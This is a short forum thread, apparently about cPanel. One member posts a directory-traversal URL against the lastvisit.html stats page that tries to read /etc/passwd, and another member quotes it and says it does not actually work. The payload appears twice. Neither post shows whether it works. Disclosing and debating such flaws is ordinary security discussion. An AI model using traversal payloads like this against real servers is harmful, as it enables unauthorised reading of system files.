Status
Not open for further replies.

capoeng2004

Member
Oct 18, 2004
10
0
151
thedomain.com:2082/frontend/x2/stats/lastvisit.html?domain=../../../../../../../../etc/passwd

with this command, a reguler user can read /etc/passwd :mad:
 

Spiral

BANNED
Jun 24, 2005
2,020
8
193
thedomain.com:2082/frontend/x2/stats/lastvisit.html?domain=../../../../../../../../etc/passwd

with this command, a reguler user can read /etc/passwd :mad:
Actually, it wouldn't hurt to investigate a little to know what
you are talking about before opening your mouth too.

FYI: The old wannabe exploit you listed doesn't actually show /etc/passwd

(Stop and think about it for a few minutes and you'll figure it out ;) )
 
Status
Not open for further replies.